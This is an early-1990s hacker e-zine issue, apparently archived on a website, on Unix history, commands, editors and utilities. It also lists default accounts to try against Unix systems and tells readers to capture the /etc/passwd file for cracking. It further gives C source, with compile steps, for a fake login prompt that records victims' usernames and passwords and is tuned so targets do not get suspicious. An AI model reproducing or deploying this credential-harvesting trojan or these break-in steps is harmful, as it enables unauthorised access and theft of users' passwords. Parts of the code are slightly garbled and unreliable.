Copy Link
Add to Bookmark
Report

NetWork Hackers Alliance 2

eZine's profile picture
Published in 
Network Hackers Alliance
 · 5 years ago

  



___ ___ ___ ___ ___________
| \ | |\ | |\ | |\ | |\
| \ | | | | | | | | | | ___ | |
| \ | | | | |_|_| | | | |\ _| | |
| \| | | | | | | |_|_| | |
| |\ | | | ___ | | | ___ | |
| | \ | | | |\ _| | | | |\ _| | |
| | |\ | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | | | |
|___| | |___| | |___| | |___| | |___| | |___| |
\___\| \___\| \___\| \___\| \___\| \___\|



- A Production of the NetWork Hacker Alliance INC -


PreZidents:Inphiniti & Code of Honor & Cobra

NHA Member Boards Listing
+=+=+=+=+=+=+=+=+=+=+=+=+
+---------------------+---------------+-------------+---------+
| Inphiniti's Edge | 216-662-5115 | NHA *WHQ* | NoT |
| Project Phusion | 301-365-9249 | NHA Node 1 | NoT |
| Realm of Chaos | 516-466-8259 | NHA Node 2 | Ex-NASTY|
+---------------------+---------------+-------------+---------+


NHA is now accepting applications.. If you are intrested
and knowledgable in the Hacking of Networks and Phreaking
etc, please call your fine H/p bbs system and download
'NHA-APP.TXT' and upload it to Inphiniti's Edge.

+--------------------------+
| -- NHA -- |
| NetWork Hackers Alliance |
+--------------------------+

Presents

Issue 2 : "Unix Information and Hacking"

Compiled by Inphiniti & Cobra
Edited by Inphiniti & Cobra
---
AXiS & NHA have merged as of 06/30/91 for the better of H/P in America.
---

---
Index

I. Introduction
II. History of UNIX
III. Unix Portability (other names for Unix)
IV. Frequently Used Commands (explained in detail)
V. Unix Editors (explained in detial)
VI Standard Unix Utilities
VII. UNIX Default Accounts
VIII. UNIX Password Attacker
IX. Closing Remarks
---

+-----------------+
| I. Introduction |
+-----------------+

What is an Operating System?

UNIX is a modern day operating system. But, what is an operating system?
One definition of an operating system is:

"the programs of a digital computer system which, together with the
characteristics of the computer system, form the basis of the various
operational modes of the digital computer system and especially those
which control and supervise the processing of programs."


This compact and comprehensive description assumes the understanding of
some concepts. The "digital computer system" is the hardware. These are the
physical components of the computer which can be touched. Thirty years ago
this description would have been sufficient. Today addicitonal concepts are
required. Besides the "body", a computer system must have a "soul". Since
a "soul" must be immaterial, it can only consist of software in a computer.
This software is the operating system.

Therefore, the characteristics, better yet the hardware characteristics of
the computer system, together with the operating system form the basis of the
processing capabilities. The operating system does not include all the
software in a computer. This is the software which permites the user of the
system to execute the applications software specifically written to be used
with that operating system. The user of a modern computer system is no
longer confronted by the hardware, but with the operating system such as UNIX.

From this viewpoint of the user, there are three basic operating modes

o Batch Processing
o Conversational (or interactive) mode
o Real-time processing

Batch processing originated during the time when executable programs were
read on a card reader in the form of a punched card dec, consisting of
control statements and the actual program.. The punched cards have now
disappeared - at best they can still be found as scraps for notes - but the
concept and the operating mode remains.

Batch jobs

A barch job must be defined completely and in the proper sequence. The ]
control statements are usually stored in a file. One of these statements calls
the program to be executed Several programs can be initiiated within a batch
job. However, all required operating devices such as disck storage, magnetic
tape storage, printer, plotter, etc. must be requested from inside the job.
No calls to the operating system are permitted since they are not answered.

Unix and MS-DOS,CP/M or OS/2

UNIX is the oldest of the three systems, even though it has been discussed
only in the last few yeards. CP/M and MS-DOS are oriented strongly toweds
the main features if UNIX. The newer versions of MS-DOS resemble UNIX
very much. Even the command syntax is very similar The largest step in
the direction of UNIX came with DOS Version 2.0.

Viewed from the users perspectivem the file systems of UNIX and DOS resemble
earch other alot. Both orginate in a root are structured hierarchically
(like a tree). Directories permit the user to retain an overview. Besides
the common files and directories, UNIX also knows an additional type, the
device file. Devide files provide an interface to the physical devices
which are addressed just like an ordinart file. Special systems call for
control of the peripherals and are therefore not required.

Internally a UNIX file differs from a CO/M or DOS file. The orientation
towards the record oand bloack structure of a disk has been dropped. UNIX
recoqnizes only blocks which contain byte chains. The type of file does
not make any difference to UNIX, since it is only a concern of the
application program using the file.

+---------------------+
| II. History of Unix |
+---------------------+

The history of UNIX begain in 1969 at Bell Labortatories, which is part
of AT&T. Kennth Thompson developed an operating system writtern in
DEC PDP-7 assembler code for the "Soace Travel" project. He called it
UNIX. The names was derived from the preceding operating system
Multics which was less conservative in the use of scare computer
resources. UNIX was at first a single user variant of Multics.

In 1971 UNIS was implemented again in assembler code on ther more powerful
computers of the PDP-11 series. To become more independant from another
change in hardware, Thompson planned a new implementation in a higher level
language. He developed the B language from BCPL in 1970, but this language
did not prove powerful enough.

After Dennis Ritchie, also a Bell, created the C language, UNIX was
rewritten almost completely in this higher level language by 1073. By
utilizing the advantages of C, UNIX became capable of handling multiusers
and multi-tasking. UNIX was then machine independent and the start signal
for its rapid distribution was given. At that time, Version 5 was still
being distributed to American universites free of chare for use in research
and education. Berkeley University in particular developed UNIX further.

The real triumph begain in 1975 with Version 6. AT&T granted source
licenses to intrested companies, but without support. From this
release, derivatives of UNIX were created with spilt away from the main
development.

Version 7 of UNIX appeard about the same time as the first 16-bit
microprocessors. This is the version onwhich most of todays Unix
derivatives are based. A third branch also developed, which is
characterizedmost by the Microsoft product XENIX.

Since 1983 AT&T has tried to bring the various development streams
together again. Training, documentation and other support is
being offered. The external sign is a new number series know as System
V.

+------------------------+
| III. Unix Portability |
+------------------------+

System Name Manufacturer
----------- ------------
Aix IBM
bsd University of California at Berkeley
Coherent Mark Williams Co.
Cromix Cromemco
Edition VII Perkin-Elmer
EUNIX Electronic Info Systems, INC
IDRIS Whitesmith Ltd.
IS/1 Interactive Systems, INC
IS/5 Interactive Systems, INC
JOS CRDS
MUNIX PCS
OS-1 Software Labs
SINIX Siemens
Unica Knowlogy
UTS Amdahl
UNIX Nixdorf
UX Hwelett Packard
VENIX Ventur Com Ulnc.
XENIX Microsoft Co.
ZEUS Zilog

+-------------------------------+
| IV. Frequently Used Commands |
+-------------------------------+


Name: CAL
Syntax: cal [MM] yyyy
Function: Creates calendar excerpts.
Options: None

Name: CANCEL
Syntax: cancel [reqiest-id ...] [printer ...]
Function: Print reuest made with ld or 1pr are canceled
Options: None

Name: CAT
Syntax: cat [filename]
Function: Writes the files indicated screen
Options: none

Name: CLEAR
Syntax: clear
Function: Clears the display screen.
Options: none

Name: COMM
Syntax: comm [optoms] dat1 dat2
Function: Displays the lines common to files dat1 and dat2
Options: -1 \
-2 > Suppress output of the corresponding columns/lines
-3 /

Name: CRYPT
Syntax: crypt [key]
Functions: Encodes and decodes text.
Options: None

Name: DATE
Systax: date [date, time]
Functions: Outputs date and time
Options: None

Name: DU
Syntax: du [option] [dat1] ...
Functions: Returns the disk usage or block assignment o the files.
Options: -a Block number for eache file (defult)
-s Only the total number of blocks is indicated

Name: ECHO
Syntax: echo [arguments] [\character]
Function: Output of commentary in shell procedures.
Options: System dependant.

Name: FILE
Syntax: file [options] file1 ...
Function: Attempts to determine the specified files class.
Options: Machine dependant.

Name: GREP
Syntax: grep [options] expressions [file1] ...
Function: Searched the specified files for text patterns which
where indicated.
Options: -b Include Bloack numbers
-c Count number of matching lines
-f file Searches ex[ression is in the indicated file and not
in the arguement.
-h No filename in the output line
-n Output line number in every hit line
-s No output, only status for procedures
0 = hit
1 = not hit
2 = syntax error
-v Inversion of the command
-y No distinction made between upper and lower case letters

Name: HEAD
Syntax: head [option] [file1] ...
Function: The first N lines of stdin, or the files indicated
Options: -n Indicates the numbner of lines from the beginning of the
file.

Name: LOGIN
Syntax: login NAME
Function: Logs new users on the system and removes old users.
Options: None

Name: LP
Syntax: lp [options] [file1] ...
Function: Insterts a print request ino the wait quee of the spool
system.
Options: -c Creates a temporary Copy file
-m After print output, a message is sent by mail
to the orginator
-r remove file after insertion of a temporary copy into
waiting queue

Name: LPSTAT
Syntax: lpstat [options] [request...]
Function: Provides information for the spool system, including
the current status of th print queue
Options: -u [list] oputputs the status of all print requests for
users in the list specified, each sperarated by
a comma.

Name: MORE & PG
Syntax: more [options] [file1] ...
pg [options] [file1] ...
Function: Display ready preparation of output with user controls
for ease of viewing.
Options: -l returs a disply ready list

Name: PASSWD
Syntax: passwd [user-name]
Function: Change or define a new password
Options: None

Name: PR
Syntax: pr [options] [file1] ...
Function: Prepates files for printing.
Options: -h following textis output as header.
-l[n] Lines per page
-n n column output
-n[nz] Line numbering
n = Number Size
z Dividing charaters between line numbers and content
-o[n] n charaters spaces at the left border
-p[n] After n pages, wait so that baper can be changed
-t Suppresses title, line numbers and date.
-w[n] Page width in charaters.

Name: PS
Syntax: ps [options] [process1 ...] [user1 ...]
Function: Gives status information about active processes.
Options: -a All interactive processes.
-e All process for all users.
-f Complete information list
-l long form of the information list.
-u user all process for the indicated users.

Name: SORT
syntax: sort [options] [+pos1] [-pos2] [file1] ...
Function. Sorts the lines of all files indicated according to
the ascii character set.
Options: -b Ignore blanks and tab characters at the begining
of the file.
-d Consider only alphanumeric characters and blanks.
-f Treat uppercase letters as lowercase
-r Sort in revers order.
-t [c] Dividing character c, may not be a space

Name: SPLIT
Syntax: split [-n] [file [name]]
Function: Splits the indicated file into parts of n lines each.
Option: -n Number of lines for each partial file.

Name: TAIL
Syntax: tail [n [units]] [file1 ...]
Functions: Copies the named file to stdout, beginning at the
designated postion within the file.
Options: None

Name: TIME
Syntax: time [command]
Function: Returns the execution time of a command or program with
actual delays in seconds.
Options: None

Name: WC
Syntax: wc [options] [file1] ...
Function: Counts lines, words and/or charaters in the indicated file
Options: -l counts only lines
-w counts only words
-c counts only characters

Name: WHO
syntax: who
Function: Returns information about current users, user ids, terminals
and start of session.
Options: None

+-----------------+
| V. Unix Editors |
+-----------------+

There are three basic editors in the unix environment. Some systems have
other non-portable editors but there are three basic ones.

ed:
- line oriented
- interactive

sed:
- line oriented
- not interactive
- for batch processing

vi:
- most powerful UNIX editor
- interactive
- full screen capability

-- ED Editor Command Summary --

syntax: ed [-] [-x] [file]

Commands
--------
a append
i insert
c change
w [file] write to [file]
. current line
$ last line
n Specifir line number n
+n Go ahead N lines
-n Go back N lines
d delete
e file Reads file into current file
f outputs name of processed files
j join
l list
p print
r file read and insserrs specified file behind the indicated buffer
m [line] move to line #
t [line] transfer to line #
u undo
q quit
! executes the shell command


-- SED Editor Command Summary --

Syntax: sed [-n] [-e script] [-f cmd_file] [input_file ...]

Options: -e sed command can be indicated directly
-f sed command are read from specifierd command file
-n suppresses the standard output


-- VI Editor Command Summary --

a append
i insert
o open
esc to exit insert mode
w write file
q to quit
j move down one line
k move up one line

+-----------------------------+
| VI. Standard Unix Utilities |
+-----------------------------+

(Please Note: When entering this commands in UNIX you type in lower case)

ACCEPT Permits spooling request for printer

ADB Absolute debugger

AR Maintains portable archives and libaries

AS Assembler

AT Executes commands at a later time

AWK Pattern scanning and processing language

BANNER Makes text banners

BASENAME Outputs filename from path name

BATCH Executes commands at a later time

BC Desktop calculator with programming constuctions

BDIFF Compares two large files

BFS Big file scanner

CAL Outputs a Calander

CALENDAR Appointment scheduler

CANCEL Cancels previous spool requests

CAT COncatenates and prints files

CC C Language compiler

CD Changed current work directory

CHGRP Changes group ownership of file or directory

CHMOD Changes file access permission

CHOWN Changes file ownership

CMP Compares two files

COL Filters revers line feeds

COMM Selects or rejects lines common to two sorted files

CP Copies files

COIP Copies files archives in and out

CPP C language preprocessor

CRYPT Encodes and Decodes text

CSPLIT Splits files based on pattern matching

CT Spawns a getty process to a remote terminal

CTRACE Traces C program execution

CU Calls another UNIX system

CUT Cuts out selected fields of each line of a file

CREF Generates C program cross-reference listing

DATE Sets or prints the current date

DC Desktop calculator

DD Performs file trasnformations

DEROFF Removes formatting commands from file

DF Displays free space in file system

DIFF Compares two files

DIFF3 Compares three files

DIRCMP Compares directories

DIRNAME Outputs the path from a path name

DIS Object file disassembler

DISABLE Disables spooling on printer

DU Summarizes Disk usage

ECHO Echoes arguments

ED Line-oriented editor

EDIT Line-oriented editor

ENABLE Enables spooling on a printer

ENV Sets environment for command execution

EXPR Evaluates arguments as an expression

FACTOR Obtains prime factors of a number

FGREP Searchs a file for a character string

FILE Determines file type

FIND Searches for files

FSDB Debugs damaged file systems

GED Graphical Editor

GETOPTS Phrase command line options

GLOSSARY Displays definitions of UNIX system terms and symbols

GRAPH Draws a graph

GRAPHICS Accesses graphical and numerical commands

GREEK Selects terminal filter

GREP Selects lines of a file based on a pattern matching

GUTIL Graphical utilties

HELP Provides on-line help on UNIX commands

HELPADM Makes changes to the Help Facility Database

ID Outputs user and group ID's and names

IPCS Reports interprocess communication ffacilities status

JOIN Joins two tabular data files

KILL Terminates or signals a process

LINE Copies a line from standard input to output

LN Links file names

LOGIN Admits autorized users to system

LOGNAME Outputs the user's login name

LP Line printer spooler

LPR Line printer spooler

LPADMIN Configes the 1p spooling system

LPSTAT Printer spooling status information

LS Lists contents of directories

M4 Macro processor

MAIL Sends and recieves UNIX mail

MAILX Extended Mail Facility

MAKE Regenerates groups of programs

MAKEKEY Regenerates encryption key

MAN Prints on-line manual entries

MESG Permits or denies messages

MKDIR Makes a Directory

MKFS Creates a file system on disk

MKNOD Creates a directory entry for a special file

MOUNT Mounts a file system

MV Moves files

MVDIR Moves a directory

NEWFORM Reformats lines of a text file

NEWGRP Changes active group membership

NEWS Prints News commands

NICE Runs a program at reduced priority

NL Line numbering filter

NOHUP Runs a command immune from hang-ups and quits

NROFF Text formatter

OD Outputs an octal dump of a file

PACK Packs files

PASSWD Changes online users password

PASTE Merge lines of files

PCAT Concatenates packed files

PG Browse file contents on terminal screen

PR Print files

PS Outputs process status

PWD Prints the name of the current working directory

RM Removes files

RMDIR Removes directories

RSH Restricted UNIX system shell

SAG Outputs system activity graph

SAR Outputs system activity report

SCAT Concatenates and prints files

SDB Symbolic debugger

SDIFF Compares two files

SED Stream Editor

SH The Unix system shell

SHL Shell layer manager

SHUTDOWN Shuts down the system

SLEEP Suppends execution for a time interval

SORT Sorts and merges files

SPLIT Splits a file

STARTER Displays UNIX information for new users

STRIP Removres symbol table information from object file

STTY Sets ternubak characterustics

SU Tempararily changes the user-ID

SUM Outputs checksum and block count for file

SYNC Writes disk buffers to disk

SYSADM Menu Driven system administration utility

TABS Srets tabs on a terminal

TAIL Outputs the last oart of a file

TAR Tape file archiver

TEE Pipe fitter

TEST Evaluates conditions

TIME Times command execution

TOUCH Updates access and modifications times of a file

TR Character translation fiflter

TROFF Phototypesetter text formatter

TRUE Returns true value

TTY Outputs name of a terminal

UNMASK Setsr file creation mode mask

UMOUNT Dismounts a file system

UNAME Outputs the name of the current UNIX system

UNIQ Outputs a file with unique lines

UNITS Performs units conversions

UNPACK Unpacks packed files

USAGE Displays information about command usage

UUCP Copies files between UNIX systems

UULOG Outputs UUCP log information

UUNAME Outputs UUCP names of known systems

UUSTAT Outputs UUCP status information

UUX Executes a command on a remote UNIX system

VI Full screen editor

WAIT Waites for completeion of background processing

WALL Sends a message to all users

WC Outputs line, word and character counts for files

WHO Outpurts information on current users

WRITE Sends messages to another user

XARGS Constructs an argument list and executes a command

YACC Compiler-generating tool


+----------------------------+
| VII. Unix Defualt Accounts |
+----------------------------+

Super User Default Accounts

ROOT
MAKESYST
MOUNTSYS
UMUNTFSYS
CHECKSYS
FSYS

Regular User Defaults

DAEMON
DAEMONx (x value is 1 thru 9)
LP

Unix Systems that have already been hacked try..

ROCUSER
IEx (x value is 1 thru 4)
ANONYMOUS
GUEST


If it askes for a password I doubt you will get in but always try the
account name.

Once in type this (at the waiting prompt usually a # or $)

cd /ETC (UNIX root directory)
cat PASSWD (UNIX password file) <--- Capture this if you can get it
then find a UNIX hacker on your local H/P board and let it run!

+------------------------------+
| VIII. Unix Password Attacker |
+------------------------------+


/* this is what a 'C' comment looks like. You can leave them out. */

/* #define's are like macros you can use for configuration. */

#define SYSTEM "\n\nTiburon Systems 4.2bsd UNIX (shark)\n\n"

/* The above string should be made to look like the message that your
* system prints when ready. Each \n represents a carriage return.
*/


#define LOGIN "login: "

/* The above is the login prompt. You shouldn't have to change it
* unless you're running some strange version of UNIX.
*/


#define PASSWORD "password:"

/* The above is the password prompt. You shouldn't have to change
* it, either.
*/


#define WAIT 2

/* The numerical value assigned to WAIT is the delay you get after
* "password:" and before "login incorrect." Change it (0 = almost
* no delay, 5 = LONG delay) so it looks like your system's delay.
* realism is the key here - we don't want our target to become
* suspicious.
*/



#define INCORRECT "Login incorrect.\n"

/* Change the above so it is what your system says when an incorrect
* login is given. You shouldn't have to change it.
*/


#define FILENAME "stuff"

/* FILENAME is the name of the file that the hacked passwords will
* be put into automatically. 'stuff' is a perfectly good name.
*/


/* Don't change the rest of the program unless there is a need to
* and you know 'C'.
*/


#include <curses.h>
#include <signal.h>
int stop();

main()
{
char name[10], password[10];
int i;
FILE *fp, *fopen();
signal(SIGINT,stop);
initscr();
printf(SYSTEM);
printf(LOGIN);
scanf("%[^\n]",name);
getchar();
noecho();
printf(PASSWORD);
scanf("%[^\n]",password);
printf("\n");
getchar();
echo();
sleep(WAIT);


if ( ( fp = fopen(FILENAME,"a") ) != NULL ) {
#fprintf(fp,"login %s has password %s\n",name,password);
#fclose(fp);
#}

printf(INCORRECT);
endwin();
}

stop()
{
endwin();
exit(0);
}

-- END --

** this is how you compile it

cc horse.c -lcurses -ltermcap
mv a.out horse
source trap (again, don't type the %)



+---------------------+
| IX. Closing Remarks |
+---------------------+


Well this is the end of Unix Hacking Volume I. You should have a firm
awareness with UNIX now and I hope you continue to grow and wait for
our UNIX Hacking Voulume II which will contains holes into the unix
system..

NHA nor the Author(s) of this file are responisble for any use that
may come into play by the reader. This is meant for education purposes
only not for any illegal activities.

___ ___ ___ ___ ___________
| \ | |\ | |\ | |\ | |\
| \ | | | | | | | | | | ___ | |
| \ | | | | |_|_| | | | |\ _| | |
| \| | | | | | | |_|_| | |
| |\ | | | ___ | | | ___ | |
| | \ | | | |\ _| | | | |\ _| | |
| | |\ | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | | | |
|___| | |___| | |___| | |___| | |___| | |___| |
\___\| \___\| \___\| \___\| \___\| \___\|

- A Production of the NetWork Hacker Alliance INC -

PreZidents:Inphiniti & Code of Honor & Cobra

NHA Member Boards Listing
+=+=+=+=+=+=+=+=+=+=+=+=+
+---------------------+---------------+-------------+---------+
| Inphiniti's Edge | 216-662-5115 | NHA *WHQ* | NoT |
| Project Phusion | 301-365-9249 | NHA Node 1 | NoT |
| Realm of Chaos | 516-466-8259 | NHA Node 2 | Ex-NASTY|
+---------------------+---------------+-------------+---------+





NHA is now accepting applications.. If you are intrested
and knowledgable in the Hacking of Networks and Phreaking
etc, please call your fine H/p bbs system and download
'NHA-APP.TXT' and upload it to Inphiniti's Edge.

With this file we welcome Keener into NHA.


N.H.A. The Future of Hacking and Phreaking


In the works....

CBI Advanced Usage
TRW Advanced Usage
Milton.Edu Advanced Usage

more to come from N.H.A.

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT